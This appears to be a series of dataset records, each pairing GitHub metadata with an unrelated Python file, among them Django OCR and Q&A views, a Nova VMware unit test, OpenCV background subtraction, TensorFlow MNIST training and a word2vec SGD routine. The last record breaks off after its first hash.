e26d89b7e11f902fedb6642e9e4fe942105a1f1e
|
/LAB17/aluno.py
|
d334b2ca9af50221012b70a3e9bfa89c78cbcd3a
|
[] |
no_license
|
Marcos-Tonari-Diaz/MC102
|
8caed787a897e42a4bead1aa46f4d89dd8b028de
|
6482fa4ed09f103ed5757e7b76c202b1e5f85d9c
|
refs/heads/main
| 2023-03-01T02:29:25.506078 | 2021-02-02T00:24:50 | 2021-02-02T00:24:50 | 335,121,247 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 201 |
py
|
class Aluno:
def __init__(self, nome, ra, email, usuario, senha):
self.nome = nome
self.ra = ra
self.email = email
self.usuario = usuario
self.senha = senha
|
[
"marcos.dure.diaz@gmail.com"
] |
marcos.dure.diaz@gmail.com
|
47955f0cfeb6ad8ef9ded6bffccc8aa706933bee
|
acb8e84e3b9c987fcab341f799f41d5a5ec4d587
|
/langs/5/l5d.py
|
d8160fd04b64e99d78c07839a70756ef5e92a3dc
|
[] |
no_license
|
G4te-Keep3r/HowdyHackers
|
46bfad63eafe5ac515da363e1c75fa6f4b9bca32
|
fb6d391aaecb60ab5c4650d4ae2ddd599fd85db2
|
refs/heads/master
| 2020-08-01T12:08:10.782018 | 2016-11-13T20:45:50 | 2016-11-13T20:45:50 | 73,624,224 | 0 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 486 |
py
|
import sys
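# Interprets a toy language: lines of the form
#   l5D " some words "
# where the tokens (including the bare quote characters) are whitespace-separated.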
def printFunction(lineRemaining):
if lineRemaining[0] == '"' and lineRemaining[-1] == '"':
if len(lineRemaining) > 2:
#data to print
lineRemaining = lineRemaining[1:-1]
print ' '.join(lineRemaining)
else:
print
def main(fileName):
with open(fileName) as f:
for line in f:
data = line.split()
if data[0] == 'l5D':
printFunction(data[1:])
else:
print 'ERROR'
return
if __name__ == '__main__':
main(sys.argv[1])
|
[
"juliettaylorswift@gmail.com"
] |
juliettaylorswift@gmail.com
|
ec781f7631675e66a19b9c7c2f94e55d983f2331
|
46549aa548d7c367caf4f03dce97da373f71a299
|
/src/python/sandbox/checkin_times.py
|
ef9f62f79a4dc7340dc6d120bbb0e95ffa798193
|
[] |
no_license
|
rboberg/bodeza
|
6177b01c13c5b1a5e442f743014555667b98bf85
|
1b061fe10bb97d8d8f5f49c9ea5d86600fe4c7ae
|
refs/heads/master
| 2021-01-10T21:39:45.457763 | 2014-12-19T06:00:13 | 2014-12-19T06:00:13 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 863 |
py
|
# -*- coding: utf-8 -*-
"""
Created on Thu Oct 09 19:33:59 2014
@author: Ross
"""
import os
import json
import pandas as pd
from ggplot import *
repo_dir = 'C:/Users/Ross/Documents/GitHub/bodeza'
data_dir = os.path.dirname(repo_dir) + '/bodeza_data'
fd = open(data_dir + '/yelp_data/yelp_academic_dataset_checkin.json')
data_list = []
for line in fd:
line_data = line.strip()
if line_data:
data_list.append(json.loads(line))
fd.close()
checkins = {}
for checkin in data_list:
for time, n in checkin['checkin_info'].iteritems():
if time in checkins:
checkins[time] += 1
else:
checkins[time] = 1
freq_dict = [dict(zip(['h','d','n'], ki.split('-')+[vi])) for ki, vi in checkins.iteritems()]
freq_df = pd.DataFrame(freq_dict)
print ggplot(freq_df, aes(x='h', y='n', colour='d')) + geom_line()
|
[
"ross.boberg@gmail.com"
] |
ross.boberg@gmail.com
|
e6334f2a64f9a1b31d53af7cad6ac3abe5758f7d
|
8cce0b5a4be09783016906a36192c52e9daa84aa
|
/cv_workshops/13-section/7-clazz.py
|
4640afbe5beea856e54129e53ebbe39d9916db00
|
[
"MIT"
] |
permissive
|
Castrol68/opencv-practice
|
fcc9495553d3a10fb045c396697391a5d2a06f36
|
83d76132d004ebbc96d99d34a0fd3fc37a044f9f
|
refs/heads/master
| 2023-08-31T07:18:51.497902 | 2020-05-03T17:43:12 | 2020-05-03T17:43:12 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,057 |
py
|
#!/usr/bin/env python3
# -*- coding=utf-8 -*-
import tensorflow as tf
"""
TensorFlow - hello world
使用安装的TensorFlow 2.0并导入
"""
def main():
# 导入数据集, 数据集下载地址为: http://yann.lecun.com/exdb/mnist/
mnist = tf.keras.datasets.mnist
(x_train, y_train), (x_test, y_test) = mnist.load_data()
# 将整数数据集转换为浮点数
x_train, x_test = x_train / 255.0, x_test / 255.0
# 搭建Sequential模型,并将数据堆叠起来
model = tf.keras.models.Sequential([
tf.keras.layers.Flatten(input_shape=(28, 28)),
tf.keras.layers.Dense(128, activation='relu'),
tf.keras.layers.Dropout(0.2),
tf.keras.layers.Dense(10, activation='softmax')
])
model.compile(optimizer='adam',
loss='sparse_categorical_crossentropy',
metrics=['accuracy'])
# 训练
model.fit(x_train, y_train, epochs=5)
# 验证
model.evaluate(x_test, y_test)
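    # A single prediction could then be drawn from the trained model, e.g.:
    #   probs = model.predict(x_test[:1])  # (1, 10) array of class probabilities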
if "__main__" == __name__:
main()
|
[
"afterloe@foxmail.com"
] |
afterloe@foxmail.com
|
6ec621dff6324b2822383c42b374ac54637d859a
|
dc72e1eb44cfaed330d9477d0c27bee307a81e4a
|
/Jackpointnew/hand/scripts.py
|
47913e46358e99f954ce1218749325896b5b7a09
|
[] |
no_license
|
bussiere/JackPointFInal
|
ba200d85606e17b423535af20a58c04bf5afa550
|
c414480fee519e68aece68068e941278fe10cf0a
|
refs/heads/master
| 2021-07-24T14:25:56.982106 | 2013-07-08T11:10:41 | 2013-07-08T11:10:41 | 5,333,141 | 0 | 0 | null | 2021-06-10T17:45:33 | 2012-08-07T20:29:46 |
Python
|
UTF-8
|
Python
| false | false | 3,808 |
py
|
from django.contrib.auth.models import User
from django.contrib.auth import authenticate
from django.contrib.auth.decorators import login_required
from django.contrib import auth
from skill.models import Skill
from carac.models import Carac
from item.models import Item
from carac.forms import CaracFormChoice
from skill.forms import SkillForm
from item.forms import ItemForm
from jack.forms import JackRegisterForm
from django.forms.formsets import formset_factory
from django.forms.formsets import BaseFormSet
from hand.forms import AskForm
from hand.models import Question,Answer
from jack.models import CaracUser,SkillUser,ItemUser
from tag.models import Tag
from engine.models import ThreadEngine
from engine.script import sendnotification
# TODO
# refactor the registration of skills, caracs and items
def enregistrementAnswer(request):
user = User.objects.get(id=request.user.id)
reponse = request.POST['Reponse']
tags = request.POST['Tags']
threadengineid = int(request.POST['ThreadEngineId'])
threadengine = ThreadEngine.objects.get(id=threadengineid)
questionid = int(request.POST['QuestionId'])
tags = tags.split("#")
question = Question.objects.get(id=questionid)
answer = Answer.objects.create(user=user,Text=reponse)
answer.Question.add(question)
    # TODO
    # refactor (duplicated tag handling)
for tag in tags :
tag = tag.strip()
try :
result = Tag.objects.get(Name=tag)
except :
result = Tag.objects.create(Name=tag)
result.save()
answer.Tags.add(result)
answer.save()
threadengine.Answer.add(answer)
threadengine.save()
def enregistrementAsk(request,caracs,skills,items,intitule,description,tags) :
question = Question.objects.create()
question.save()
question.user = User.objects.get(id=request.user.id)
question.Text = description
question.Intitule = intitule
question.save()
    # TODO
    # refactor and document the tag handling
tags = tags.split('#')
    # TODO
    # refactor (same tag loop as above)
for tag in tags :
tag = tag.strip()
try :
result = Tag.objects.get(Name=tag)
except :
result = Tag.objects.create(Name=tag)
result.save()
question.Tags.add(result)
question.save()
for carac in caracs.keys():
caracdb = Carac.objects.get(Nom=carac)
try :
result = CaracUser.objects.get(carac=caracdb,Level=int(caracs[carac][0]))
except :
result = CaracUser.objects.create(Level=0)
result.Carac.add(caracdb)
result.Level = int(caracs[carac][0])
result.save()
question.Caracs.add(result)
    private = False  # defined before the loops: the items loop below reads it too
    for skill in skills.keys():
        skilldb = Skill.objects.get(Nom=skill)
        print "nomSki"
        print skilldb.Nom
try :
result = SkillUser.objects.get(Skills=skilldb,Level=int(skills[skill][0]))
except :
result = SkillUser.objects.create(Level=0)
result.Skill.add(skilldb)
result.Private = private
result.Level = int(skills[skill][0])
result.save()
question.Skills.add(result)
for item in items.keys():
itemdb = Item.objects.get(Nom=item)
try :
result = ItemUser.objects.get(Item=itemdb)
except :
result = ItemUser.objects.create()
result.Item.add(itemdb)
result.Private = private
result.save()
question.Items.add(result)
question.save()
threadengine = ThreadEngine.objects.create()
threadengine.Question.add(question)
threadengine.save()
sendnotification(question,threadengine)
|
[
"bussiere@gmail.com"
] |
bussiere@gmail.com
|
b9f331103a0bf956b0ad3d59e3c5760c3f9345fb
|
944809cdb595c2338518977317253f5cfa89756e
|
/scripts/background_subtraction.py
|
b552e7e8b692a4524d7f35a4a924144c3ca5f158
|
[] |
no_license
|
adithyamurali/DeepMilestones
|
874965d7040d4ef54f6a6692274bd7ce8c791178
|
c031f55595dbfc01d493bce0ccab548bdecb6001
|
refs/heads/master
| 2021-01-22T14:01:56.932705 | 2015-10-02T01:16:35 | 2015-10-02T01:16:35 | 39,215,948 | 3 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,070 |
py
|
import numpy as np
import cv2
import argparse
import sys
import matplotlib.pyplot as plt
import IPython
import parser
import utils
import constants
def run_video_with_bsub(cap, func, kernel = None, params = None):
if params is not None:
fgbg = func(params[0], params[1], params[2], params[3])
else:
fgbg = func()
SAVE_PATH = constants.PATH_TO_DATA + constants.NEW_BGSUB_FOLDER + "Suturing_E003_capture2/"
i = 1
while(1):
        ret, frame = cap.read()
        print i
        # bail out before touching the frame: comparing numpy arrays to None
        # with == is ambiguous, so test the read flag instead
        if not ret or frame is None:
            sys.exit()
        fgmask = fgbg.apply(frame)
        if kernel is not None:
            fgmask = cv2.morphologyEx(fgmask, cv2.MORPH_OPEN, kernel)
        mask_rbg = cv2.cvtColor(fgmask, cv2.COLOR_GRAY2BGR)
        draw = frame & mask_rbg
# cv2.namedWindow("frame", cv2.WND_PROP_FULLSCREEN)
# cv2.setWindowProperty("frame", cv2.WND_PROP_FULLSCREEN, cv2.cv.CV_WINDOW_FULLSCREEN)
cv2.imshow('frame', draw)
cv2.imwrite(SAVE_PATH + utils.get_frame_fig_name(i), draw)
k = cv2.waitKey(30) & 0xff
i += 1
if k == 27:
break
cap.release()
cv2.destroyAllWindows()
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("video", help = "A: Suturing: B: Pizza making")
parser.add_argument("type", help = "1: MOG 2: MOG2 3: Ken's algorithm")
args = parser.parse_args()
cap = None
if args.video == 'A':
cap = cv2.VideoCapture('/home/animesh/DeepMilestones/jigsaws/Suturing_video/frames/Suturing_E003_capture2/cropped_scaled.avi')
elif args.video == 'B':
cap = cv2.VideoCapture('/home/animesh/C3D/examples/c3d_feature_extraction/input/frm/pizza8/videos/cropped_scaled.avi')
else:
print "Invalid video type"
sys.exit()
if (int(args.type) == 1):
params = (500, 10, 0.9, 1)
run_video_with_bsub(cap, cv2.BackgroundSubtractorMOG, params = None)
elif (int(args.type) == 2):
run_video_with_bsub(cap, cv2.BackgroundSubtractorMOG2)
elif (int(args.type) == 3):
kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE,(3,3))
run_video_with_bsub(cap, cv2.createBackgroundSubtractorGMG, kernel = kernel)
else:
print "Error Type"
sys.exit()
|
[
"adithya_murali@berkeley.edu"
] |
adithya_murali@berkeley.edu
|
6a069aad4eae164b7a135b62b70c4a3ad36591d9
|
75d8667735782cd1d0eb4877e52c89da5cd92dde
|
/nova/tests/unit/virt/vmwareapi/test_configdrive.py
|
9462d39ae2ad4d8c8a8ebadc31116bba226df242
|
[
"Apache-2.0"
] |
permissive
|
bopopescu/nova-token
|
ffecfd3ec561936b7d9d7e691bc57383cde05436
|
ec98f69dea7b3e2b9013b27fd55a2c1a1ac6bfb2
|
refs/heads/master
| 2022-11-22T09:53:31.073483 | 2016-05-14T02:47:01 | 2016-05-15T22:02:55 | 282,105,621 | 0 | 0 |
Apache-2.0
| 2020-07-24T02:42:19 | 2020-07-24T02:42:18 | null |
UTF-8
|
Python
| false | false | 14,534 |
py
|
# Copyright 2013 IBM Corp.
# Copyright 2011 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
#    http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.

import fixtures
import mock
from mox3 import mox

from nova import context
from nova.image import glance
from nova import objects
from nova import test
from nova.tests.unit import fake_instance
import nova.tests.unit.image.fake
from nova.tests.unit import utils
from nova.tests.unit.virt.vmwareapi import fake as vmwareapi_fake
from nova.tests.unit.virt.vmwareapi import stubs
from nova.tests import uuidsentinel
from nova.virt import fake
from nova.virt.vmwareapi import driver
from nova.virt.vmwareapi import vm_util
from nova.virt.vmwareapi import vmops


class ConfigDriveTestCase(test.NoDBTestCase):

    REQUIRES_LOCKING = True

    @mock.patch.object(driver.VMwareVCDriver, '_register_openstack_extension')
    def setUp(self, mock_register):
        super(ConfigDriveTestCase, self).setUp()
        vm_util.vm_refs_cache_reset()
        self.context = context.RequestContext('fake', 'fake', is_admin=False)
        self.flags(cluster_name='test_cluster',
                   host_ip='test_url',
                   host_username='test_username',
                   host_password='test_pass',
                   use_linked_clone=False, group='vmware')
        self.flags(enabled=False, group='vnc')
        vmwareapi_fake.reset()
        stubs.set_stubs(self)
        nova.tests.unit.image.fake.stub_out_image_service(self)
        self.conn = driver.VMwareVCDriver(fake.FakeVirtAPI)
        self.network_info = utils.get_test_network_info()
        self.node_name = self.conn._nodename
        image_ref = nova.tests.unit.image.fake.get_valid_image_id()
        instance_values = {
            'vm_state': 'building',
            'project_id': 'fake',
            'user_id': 'fake',
            'name': '1',
            'kernel_id': '1',
            'ramdisk_id': '1',
            'mac_addresses': [{'address': 'de:ad:be:ef:be:ef'}],
            'memory_mb': 8192,
            'flavor': objects.Flavor(vcpus=4, extra_specs={}),
            'instance_type_id': 0,
            'vcpus': 4,
            'root_gb': 80,
            'image_ref': image_ref,
            'host': 'fake_host',
            'task_state': 'scheduling',
            'reservation_id': 'r-3t8muvr0',
            'id': 1,
            'uuid': uuidsentinel.foo,
            'node': self.node_name,
            'metadata': [],
            'expected_attrs': ['system_metadata'],
        }
        self.test_instance = fake_instance.fake_instance_obj(
            self.context, **instance_values)
        self.test_instance.flavor = objects.Flavor(vcpus=4, memory_mb=8192,
                                                   ephemeral_gb=0, swap=0,
                                                   extra_specs={})

        (image_service, image_id) = glance.get_remote_image_service(
            context, image_ref)
        metadata = image_service.show(context, image_id)
        self.image = objects.ImageMeta.from_dict({
            'id': image_ref,
            'disk_format': 'vmdk',
            'size': int(metadata['size']),
        })

        class FakeInstanceMetadata(object):
            def __init__(self, instance, content=None, extra_md=None,
                         network_info=None):
                pass

            def metadata_for_config_drive(self):
                return []

        self.useFixture(fixtures.MonkeyPatch(
            'nova.api.metadata.base.InstanceMetadata',
            FakeInstanceMetadata))

        def fake_make_drive(_self, _path):
            pass
        # We can't actually make a config drive v2 because ensure_tree has
        # been faked out
        self.stub_out('nova.virt.configdrive.ConfigDriveBuilder.make_drive',
                      fake_make_drive)

        def fake_upload_iso_to_datastore(iso_path, instance, **kwargs):
            pass
        self.stub_out('nova.virt.vmwareapi.images.upload_iso_to_datastore',
                      fake_upload_iso_to_datastore)

    def tearDown(self):
        super(ConfigDriveTestCase, self).tearDown()
        vmwareapi_fake.cleanup()
        nova.tests.unit.image.fake.FakeImageService_reset()

    @mock.patch.object(vmops.VMwareVMOps, '_get_instance_metadata',
                       return_value='fake_metadata')
    def _spawn_vm(self, fake_get_instance_meta,
                  injected_files=None, admin_password=None,
                  block_device_info=None):

        injected_files = injected_files or []
        self.conn.spawn(self.context, self.test_instance, self.image,
                        injected_files=injected_files,
                        admin_password=admin_password,
                        network_info=self.network_info,
                        block_device_info=block_device_info)

    def test_create_vm_with_config_drive_verify_method_invocation(self):
        self.test_instance.config_drive = 'True'
        self.mox.StubOutWithMock(vmops.VMwareVMOps, '_create_config_drive')
        self.mox.StubOutWithMock(vmops.VMwareVMOps, '_attach_cdrom_to_vm')
        self.conn._vmops._create_config_drive(self.test_instance,
                                              mox.IgnoreArg(),
                                              mox.IgnoreArg(),
                                              mox.IgnoreArg(),
                                              mox.IgnoreArg(),
                                              mox.IgnoreArg(),
                                              mox.IgnoreArg(),
                                              mox.IgnoreArg()
                                              ).AndReturn('[ds1] fake.iso')
        self.conn._vmops._attach_cdrom_to_vm(mox.IgnoreArg(),
                                             mox.IgnoreArg(),
                                             mox.IgnoreArg(),
                                             mox.IgnoreArg())
        self.mox.ReplayAll()
        # if spawn does not call the _create_config_drive or
        # _attach_cdrom_to_vm call with the correct set of parameters
        # then mox's VerifyAll will throw a Expected methods never called
        # Exception
        self._spawn_vm()

    def test_create_vm_without_config_drive(self):
        self.test_instance.config_drive = None
        self.mox.StubOutWithMock(vmops.VMwareVMOps, '_create_config_drive')
        self.mox.StubOutWithMock(vmops.VMwareVMOps, '_attach_cdrom_to_vm')
        self.mox.ReplayAll()
        # if spawn ends up calling _create_config_drive or
        # _attach_cdrom_to_vm then mox will log a Unexpected method call
        # exception
        self._spawn_vm()

    def test_create_vm_with_config_drive(self):
        self.test_instance.config_drive = 'True'
        self._spawn_vm()
|
[
"dmg@uvic.ca"
] |
dmg@uvic.ca
|
a87f1b16a0c24b911ed48b462eb0144df949a491
|
92796ecf76e64796b4d265df281bf27b4206f1b8
|
/wechat/wechat/asgi.py
|
d603532362615412bd68c8353200c60bcc0a8d45
|
[] |
no_license
|
singhsagar27/Wechat---Real-Time-Chat-App
|
e4ee1d81f2c0d9cd83154609fcf2506c7f2b0655
|
6e74354daa76b2527ed070a84a36434e5e264069
|
refs/heads/main
| 2023-03-20T19:02:13.763649 | 2021-03-19T14:33:32 | 2021-03-19T14:33:32 | 348,711,365 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 549 |
py
|
import os
from django.core.asgi import get_asgi_application
from channels.routing import ProtocolTypeRouter, URLRouter
from channels.auth import AuthMiddlewareStack
import chat.routing
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'wechat.settings')
# initialise the Django ASGI application once, up front, so its import-time
# side effects run before the routing below is built
django_asgi_app = get_asgi_application()
application = ProtocolTypeRouter({
    "http": django_asgi_app,
"websocket": AuthMiddlewareStack(
URLRouter(
chat.routing.websocket_urlpatterns
)
),
# Just HTTP for now. (We can add other protocols later.)
})
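# For reference, chat.routing.websocket_urlpatterns is assumed to follow the
# usual Channels pattern (a sketch, not part of this file):
#   websocket_urlpatterns = [
#       re_path(r"ws/chat/(?P<room_name>\w+)/$", consumers.ChatConsumer.as_asgi()),
#   ]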
|
[
"47419028+theambrosial@users.noreply.github.com"
] |
47419028+theambrosial@users.noreply.github.com
|
83b81627d484d881a90f8b4ff4ac32c922a54f53
|
6ebffea0be90da76503a95b029d4a6a07204229e
|
/data/datamodule.py
|
d2d7aa6a8a5dbb72df301df3d32e7e0c46f6988f
|
[] |
no_license
|
Huizerd/bnns
|
7853a647ba1b592f42c8c9fd0fbe31108d41fd12
|
9e13cfdf25d3050ab23692dbca47446c8b9dbd90
|
refs/heads/master
| 2023-06-24T12:33:52.086644 | 2021-06-25T11:44:05 | 2021-06-25T11:44:05 | 371,048,303 | 1 | 0 | null | 2021-06-21T11:20:52 | 2021-05-26T13:42:32 |
VHDL
|
UTF-8
|
Python
| false | false | 267 |
py
|
from pl_bolts.datasets.mnist_dataset import BinaryMNIST
from pl_bolts.datamodules.mnist_datamodule import MNISTDataModule
class BinaryMNISTDataModule(MNISTDataModule):
name = "binarymnist"
dataset_cls = BinaryMNIST # has 0.5 as threshold for making binary
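# Minimal usage sketch, assuming the standard pl_bolts DataModule interface:
#   dm = BinaryMNISTDataModule(data_dir=".", batch_size=64)
#   dm.prepare_data(); dm.setup()
#   train_loader = dm.train_dataloader()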
|
[
"15855769+Huizerd@users.noreply.github.com"
] |
15855769+Huizerd@users.noreply.github.com
|
68a6ad72b6ba110b69031ee89e2ee46750bbdae1
|
74be41563cba82ec784aed3c893a53261a428ab1
|
/myapp/ocr_api/views.py
|
db6910d7ae1c32dea6bf6323e19f1305a4a8f71f
|
[] |
no_license
|
Bakushin10/Django
|
e06ad485084d917886a50e5f3c38f8b049c85fb1
|
184db43f58e4679c2a556f9603f5e3bec61da1eb
|
refs/heads/master
| 2022-12-12T13:34:24.391273 | 2019-11-05T14:33:29 | 2019-11-05T14:33:29 | 202,837,195 | 0 | 0 | null | 2022-12-08T06:53:31 | 2019-08-17T04:55:27 |
Python
|
UTF-8
|
Python
| false | false | 5,626 |
py
|
import os, sys, json
from PIL import Image, ImageDraw2
from django.shortcuts import render
from django.shortcuts import render, HttpResponseRedirect
from django.http import HttpResponse, JsonResponse
from ocr_api.models import OCRInputModel, JsonOCRInputModel
from ocr_api.serializers import OCRInputModelSerializer, JsonOCRInputModelSerializer
from django.views.decorators.csrf import csrf_exempt
@csrf_exempt
def post_dummy_data(request):
"""
basic API call for a POST method
it will post dummy data
    based on the OCRInputModel defined in ocr_api.models
"""
if request.method == "POST":
data = {"ocrJson" : "Two"}
serializer = OCRInputModelSerializer(data = data)
if serializer.is_valid(raise_exception = True):
data_saved = serializer.save()
return HttpResponse("success: {} was created".format(data))
@csrf_exempt
def post_ocr_results(request):
"""
    **** Please don't call this API if data is already stored at the endpoint ****
demo API POST call for OCR result.
read a Json from a local file and post it to endpoint.
"""
if request.method == "POST":
response = readJson()
print("{} {} {}".format("*"*10, "tatal amount of data : ", len(response["response"])))
print("{} {}".format("*"*10, request))
for json_data in response["response"]:
# print(json_data)
x , y = [], []
for coordinate in json_data["coordinates"]:
x.append(coordinate["y"])
y.append(coordinate["x"])
data = {
"field" : str(json_data["field"]),
"hasField" : json_data["hasField"],
"coordinates" : str(json_data["coordinates"]),
"x_coordinates" : str(x),
"y_coordinates" : str(y),
"text" : json_data["text"]
}
serializer = JsonOCRInputModelSerializer(data = data)
if serializer.is_valid(raise_exception = True):
data_saved = serializer.save()
return HttpResponse("{} {} {}".format("All ", len(response["response"]), " data posted!"))
@csrf_exempt
def get_ocr_results(request):
"""
retrieve fake OCR data from an endpoint
"""
data = JsonOCRInputModel.objects.all()
if request.method == "GET":
serializer = JsonOCRInputModelSerializer(data, many = True)
dataToDisplay = getDataToDisplay(serializer.data)
return JsonResponse(dataToDisplay, safe = False)
@csrf_exempt
def get_ocr_results_by_id(request, username):
"""
    retrieve fake OCR data whose field matches the given username
"""
if request.method != "GET":
return HttpResponse("GET request only")
data = JsonOCRInputModel.objects.filter(field=username)
if len(data) == 0:
return HttpResponse("no data found")
return HttpResponse(data.values())
@csrf_exempt
def get_ocred_image(request):
"""
retrieve fake OCR data from an endpoint
"""
data = JsonOCRInputModel.objects.all()
SUCCESS_MESSAGE = {"image successfully ocred": "OK"}
ERROR_MESSAGE = {"image could not be ocred": "ERROR"}
if request.method == "GET":
serializer = JsonOCRInputModelSerializer(data, many = True)
imagePath = "ocr_api/img/"
imageName = "sample.jpg"
try:
drawLinesOnImages(imagePath, imageName, serializer.data)
except:
return JsonResponse(ERROR_MESSAGE, safe = False)
return JsonResponse(SUCCESS_MESSAGE, safe = False)
@csrf_exempt
def get_dummy_data(request):
"""
basic API call for a GET method
"""
data = OCRInputModel.objects.all()
if request.method == "GET":
serializer = OCRInputModelSerializer(data, many=True)
dataToDisplay = getDataToDisplay(serializer.data)
return JsonResponse(dataToDisplay, safe=False)
def readJson():
"""
read JSON data from local file
"""
#path = "ocr_api/json/test.json"
path = "ocr_api/json/ocrReturnValues.json"
#return ""
with open(os.path.join(sys.path[0], path)) as f:
data = json.load(f)
print("{} {}".format("*"*10, data["response"]))
return data
def getDataToDisplay(data):
"""
add "total amount amount of data" for readability purposes
"""
return ["total amount data : " + str(len(data))] + data
def drawLinesOnImages(imagePath, imageName, data):
detectTextOnImage(imagePath, imageName, data)
# detectTextBoxOnImage(imagePath)
def detectTextOnImage(imagePath,imageName, data):
"""
draw line to the image based on the x and y coordinates from JSON
"""
im = Image.open(imagePath + imageName)
d = ImageDraw2.Draw(im)
pen = ImageDraw2.Pen(color="red")
for j in data:
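        # x/y were stored via str(list) by post_ocr_results, so strip the
        # brackets and split on commas to recover the integer corner values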
x = j["x_coordinates"].replace("[","").replace("]","").split(",")
y = j["y_coordinates"].replace("[","").replace("]","").split(",")
#LB, LT, RT, RB = (c[0]["x"], c[0]["y"]), (c[1]["x"], c[1]["y"]), (c[2]["x"], c[2]["y"]), (c[3]["x"], c[3]["y"])
LB, LT, RT, RB = (int(y[0]), int(x[0])), (int(y[1]), int(x[1])), (int(y[2]), int(x[2])), (int(y[3]), int(x[3]))
d.line([LB, LT, RT, RB, LB], pen) #red line
im.save(imagePath + "ocred_" + imageName)
print("image saved")
def detectTextBoxOnImage():
"""
detect the textbox on a policy
"""
pass
|
[
"shnnagai@gmail.com"
] |
shnnagai@gmail.com
|
b1f831dc5b99ada2504bfeae16902b81d431db0e
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p03470/s172972650.py
|
57f94dcf85afe314754def063304ba328d8d9803
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 140 |
py
|
N = int(input())
d = sorted([int(input()) for i in range(N)])
ans = 1
for i in range(N-1):
if d[i] < d[i+1]:
ans += 1
print(ans)
|
[
"66529651+Aastha2104@users.noreply.github.com"
] |
66529651+Aastha2104@users.noreply.github.com
|
8b52b027b34e1dcf92be1fa08afa21d1099e7062
|
3dae023e2da2117755a6caa6476e0279a3f3573b
|
/q3_sgd.py
|
1bba51c77ebf3bb9cdc61e548b5e18e85d63395a
|
[] |
no_license
|
saifkheraj/Word2Vec-CS224D
|
86f222e3daf7dffb193ee168944cb25c847ba794
|
115855d218aa86cb4503ad57ebe71c1db0e394ab
|
refs/heads/master
| 2020-03-26T07:04:06.062565 | 2018-08-15T07:31:28 | 2018-08-15T07:31:28 | 144,635,082 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,147 |
py
|
# Save parameters every few SGD iterations as a fail-safe
SAVE_PARAMS_EVERY = 1000
import glob
import random
import numpy as np
import os.path as op
import cPickle as pickle
def load_saved_params():
""" A helper function that loads previously saved parameters and resets iteration start """
st = 0
for f in glob.glob("saved_params_*.npy"):
iter = int(op.splitext(op.basename(f))[0].split("_")[2])
if (iter > st):
st = iter
if st > 0:
with open("saved_params_%d.npy" % st, "r") as f:
params = pickle.load(f)
state = pickle.load(f)
return st, params, state
else:
return st, None, None
def save_params(iter, params):
with open("saved_params_%d.npy" % iter, "w") as f:
pickle.dump(params, f)
pickle.dump(random.getstate(), f)
def sgd(f, x0, step, iterations, postprocessing = None, useSaved = False, PRINT_EVERY=10):
""" Stochastic Gradient Descent """
# Implement the stochastic gradient descent method in this
# function.
# Inputs:
# - f: the function to optimize, it should take a single
# argument and yield two outputs, a cost and the gradient
# with respect to the arguments
# - x0: the initial point to start SGD from
# - step: the step size for SGD
# - iterations: total iterations to run SGD for
# - postprocessing: postprocessing function for the parameters
# if necessary. In the case of word2vec we will need to
# normalize the word vectors to have unit length.
# - PRINT_EVERY: specifies every how many iterations to output
# Output:
# - x: the parameter value after SGD finishes
# Anneal learning rate every several iterations
ANNEAL_EVERY = 20000
if useSaved:
start_iter, oldx, state = load_saved_params()
if start_iter > 0:
x0 = oldx;
step *= 0.5 ** (start_iter / ANNEAL_EVERY)
if state:
random.setstate(state)
else:
start_iter = 0
x = x0
if not postprocessing:
postprocessing = lambda x: x
expcost = None
for iter in xrange(start_iter + 1, iterations + 1):
### Don't forget to apply the postprocessing after every iteration!
### You might want to print the progress every few iterations.
### YOUR CODE HERE
cost,derivative=f(x)
x=x-(step*derivative)
x=postprocessing(x)
### END YOUR CODE
if iter % PRINT_EVERY == 0:
if not expcost:
expcost = cost
else:
expcost = .95 * expcost + .05 * cost
print "iter %d: %f" % (iter, expcost)
if iter % SAVE_PARAMS_EVERY == 0 and useSaved:
save_params(iter, x)
if iter % ANNEAL_EVERY == 0:
step *= 0.5
return x
def sanity_check():
quad = lambda x: (np.sum(x ** 2), x * 2)
print "Running sanity checks..."
t1 = sgd(quad, 0.5, 0.01, 1000, PRINT_EVERY=100)
print "test 1 result:", t1
assert abs(t1) <= 1e-6
t2 = sgd(quad, 0.0, 0.01, 1000, PRINT_EVERY=100)
print "test 2 result:", t2
assert abs(t2) <= 1e-6
t3 = sgd(quad, -1.5, 0.01, 1000, PRINT_EVERY=100)
print "test 3 result:", t3
assert abs(t3) <= 1e-6
print ""
def your_sanity_checks():
"""
    Use this space to add any additional sanity checks by running:
python q3_sgd.py
This function will not be called by the autograder, nor will
your additional tests be graded.
"""
print "Running your sanity checks..."
### YOUR CODE HERE
#raise NotImplementedError
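    # One possible extra check (a sketch, left commented out): a shifted
    # quadratic whose minimum sits at x = 1 should converge there as well.
    #   quad2 = lambda x: (np.sum((x - 1) ** 2), 2 * (x - 1))
    #   assert abs(sgd(quad2, 3.0, 0.01, 1000, PRINT_EVERY=100) - 1.0) <= 1e-4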
### END YOUR CODE
if __name__ == "__main__":
sanity_check();
your_sanity_checks();
|
[
"saifalikheraj@hotmail.com"
] |
saifalikheraj@hotmail.com
|
ebb1b965bd494a3d707ed357c8ce08c6929310db
|
19d16656659d625d30bfccced5d51826772f5435
|
